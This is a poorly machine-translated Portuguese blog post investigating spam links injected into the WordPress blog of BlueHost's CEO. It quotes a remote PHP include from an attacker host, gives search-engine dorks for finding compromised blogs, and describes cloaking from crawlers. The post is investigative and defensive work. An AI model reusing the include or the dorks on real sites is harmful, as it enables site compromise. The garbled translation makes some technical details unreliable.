Dezembro 11 2007 - Heaton Matt's Blog tem sido limpos. ATM ele está usando o mais recente versão do WordPress (2.3.x). E também a maior parte dos blogs listas neste artigos foi atualização.
26 de janeiro de 2008 - parece que bluehost engenheiro fez um mau trabalho a limpeza, os Goro spam está de volta.
Logo após a recente questão sobre wordpress.com.cn agora há novos wordpress imitater. Uma injecção spamware remoto por wordpress.net.in Eu era uma leitura de Matt Heaton postado 2 semanas atrás, quando eu encontrei um punhado de spamsware link em seu wordpress rodapé.
Matt's está usando wodpress tema default (kubrick) com o único javascript para o AdSense. A única maneira possível obter os spams é provavelmente na injeção ou por via php manual edição. Todos os spamware é redirecionar a howardowens.com /? Fim = XX página.
Lookup para howardowens.com
O esquema abaixo explica o lookup resultados para howardowens.com. Clique na imagem para ampliá-la.
Surpreendentemente o spammer site também é hospedeiro por bluehost.com (69.89.16.0/20, 74.220.192.0/19, 69.89.16.4 -> box183.bluehost.com).O acompanhamento do spam fontes.
Vendo mattheaton.com html fontes Encontrei alguma dica e iniciar a pesquisa para Xanax intext: id = \ "Goro \". Google retornar 2 resultados para essa pesquisa. - 1. Wordpress Suporte
- php obter rodapé adicionando spam código?
- 2. Elijahzarwan.net
- div id = "Goro" (belo título)
Ambos os sites sugerem mesmo tipo de métodos php injecção
incluir ( 'http://wordpress.net.in/statcounter.php');O statcounter.php é apenas normal text / plain completo com links spam. O spam conteúdo sobre Matt Heaton blog é gerar aleatoriamente a partir de http://wordpress.net.in/ [aleatório] / random = 1 - 9.
Raw Whois para wordpress.net.in
Domain ID: D2500581-AFIN Domain Name: WORDPRESS.NET.IN Criado em :22-Abril-2007 12:01:55 UTC atualizada em :22-Jun-2007 02:26:40 UTC A data de validade :22-Abr - 2008 12:01:55 UTC Patrocínios secretário: Direct Informação Unip. Ltd. dba PublicDomainRegistry.com (R5-AFIN) Status: OK Registrante ID: DI_4275224 Registrante Nome: Mick Jagger Registrante Organização: N / A Registrante Street1: 1 Praça Vermelha Registrante Cidade: Moscou Registrante Estado / Província: Massachusetts Registrante Código Postal: 123592 Registando País: RU Registrante Telefone: 007,7581235641 Registrante Email: mkk.goro @ bk.ru Admin ID: DI_4275224 Admin Nome: Mick Jagger Admin Organização: N / A Admin Street1: 1 Praça Vermelha Admin Cidade: Moscou Admin Estado / Província: Massachusetts Admin Código Postal: 123592 Admin País: Admin RU Tel.: 007,7581235641 Admin Email: mkk.goro @ bk.ru Tech ID: DI_4275224 Tech Nome: Mick Jagger Tech Organização: N / A Tech Street1: 1 Praça Vermelha Tech Cidade: Moscou Tech Estado / Província: Massachusetts Tech Código Postal: 123592 Tech País: RU Tech Telefone: 007,7581235641 Tech Email: mkk.goro @ bk.ru Name Server: MKKG98981.MERCURY.ORDERBOX-DNS.COM Name Server: MKKG98981.VENUS.ORDERBOX - DNS.COM Name Server: MKKG98981.EARTH.ORDERBOX-DNS.COM Name Server: MKKG98981.MARS.ORDERBOX-DNS.COM
Nota: O endereço registando em 1 quadrado vermelho é um famoso restaurante em Moscou.
Sua bonita wordpress.net.in óbvio que pertencem ao secretário da Índia.
Live exemplo wordpress.net.in injecção
Google alerta para a consulta "[function.include]" allintext: "wordpress.net.in". Usado violinista ou qualquer inspector-http para encontrar o cabeçalho completo pedido.
- 1 Evan Morris
- Wordpress 2.0.6 | url | screenshot
- 2 carwax
- Wordpress 1.5.2 | url | screenshot
- 3 aabenthus.biz
- Wordpress 2.0.x | url | screenshot
- 4 mythinger.com
- Wordpress 2.0.2 | url | screenshot
- 5 classicalanglican.net
- Wordpress 2.0.2 | url | screenshot
- 6 echo9er.net
- 1.5.1 WordPress | url | screenshot
- 7 boyarick.com
- Wordpress 2.0.2 | url | screenshot
Diretório Google busca de classe-mail.php
Busca de classe-mail.php no diretório aberto (público).
"Diretório pai" classe-mail.php-html-htm-php-shtml-md5-md5sums- jean-cyril.com - wp-inclui spams link para redirecionar www.901am.com/?page=2157. jean-cyril.com tem wp-info.txt dentro wp-inclui seu diretório. Este texto sem soltar arquivos de dados unserialize senha e coisas do género.
- floaridablog.org - wp-inclui spams redirecionar a communications.uml.edu / sunrise /? id = 1076 (Universidade de Massachusetts Lowell) o ofensor spams página foi removida pela UML mantenedor.
Escondendo de mecanismo de busca Spiders
Em primeiro lugar, eu fiz mais alguma pesquisa comparativa em archive.org para howardowens.com e mattheaton.com. Ela quer sair desta sites foi parar a partir de IA Archiver poucos meses antes do início spams mostrando a sua rodapé. Você terá que verificar howardowens índice em archive.org para que você possa compreender minhas suspeitas.
- http://web.archive.org/web/ * / http://www.howardowens.com
- http://web.archive.org/web/ * / http://www.mattheaton.com
Fora de tédio eu emantado mim como as seguintes agentes.
- Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) - 74.6.8.125 - llf520032.crawl.yahoo.net
- Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html) 66.249.64.50 - crawl-66-249-64-50.googlebot.com
- Mozilla/2.0 (compatible; Ask Jeeves / Teoma) - 65.214.44.204 - egspd42002.ask.com
- Mediapartners-Google/2.1 66.249.73.213 - crawl-66-249-73-213.googlebot.com
Não alterar muito a esses dois tipos de sites. Então eu li o estatuto cabeçalho, ele volta 404 em vez de 200. Nice truques para parar indexador & aranha de espionagem sua alegria-ride-spamhouse.
Resumo
bits e bytes a partir deste acidente já sabíamos que
- A maior parte do site injectar são executados em wordpress 2.0.6 & abaixo
- allow_furl_open é escolhido para true para esta injecção de trabalhar
- A maior parte dos blogs proprietário não tem conhecimento sobre os spams links (cloacking)
Saída Murray acesso diário, ele irá dar-lhe algumas ideias com os métodos remotos injectáveis.
Atualizar
- Dezembro 03 2007
- Todos os spams link para howardowens.com página foi removida. I havent falar com howardowens mas eu parto do princípio howard do site está a ser injectado da mesma forma como Matt Heaton blog.
- Dezembro 04 2007
- Mattheaton.com tem uma pequena atualização, os spams já injectar em ambos cabeçalho e rodapé.
tangonoticias.com: 7070/d_pill/577.html.
Como está a correr no tangonoticias.com Joomla CMS eles criam uma estática "Wordpress" na porta 7070 (Real Server Network & RSTP Porto). Este é provavelmente um trabalho diferente do atacante, tirando partido de Matt Heaton blindspot. Cache do Google (Nov 12) - Dezembro 11 2007
- Matt Heaton foi purificado. Ele agora está usando o mais recente versão do Wordpress (2.3.1). Você ainda pode visualizá-lo na memória cache pensamento & screenshot.
Relacionados Post
- Como a Removido wordpress.net.in Spam Injeção
- 31 de janeiro de 2008 - Matt Heaton Bluehost Hostmonster CEO Hacked Novamente - Strike II
Ligações externas
- 1 de dezembro de 2007 às 9:55 am
- 21 de fevereiro de 2008, 12:27 am
- 0,3
- URL
"escrever como se estivesse conversando com uma boa amiga (na frente de sua mãe)."
. a sua opinião
Aviso: Para qualquer conteúdo que você postar, você decide conceder a Kakkoi a título gratuito, irrevogável, perpétuo, exclusiva e totalmente sublicenciável para usar, reproduzir, modificar, adaptar, publicar, traduzir, criar trabalhos derivativos, distribuir, executar e exibir tal conteúdo, no todo ou em parte, em todo o mundo e para integrá-la em outras obras, sob qualquer forma, mídia ou tecnologia atualmente conhecida ou posteriormente desenvolvida. Alguns direitos reservados.
Uma resposta a "Matt Heaton BlueHost HostMonster CEO blog oficial hackeada"
[...] הבלוג הרשמי של מט הטון נשיא חברות האחסון אתרים:, blueHost & HostMonsr נפרץ. [...]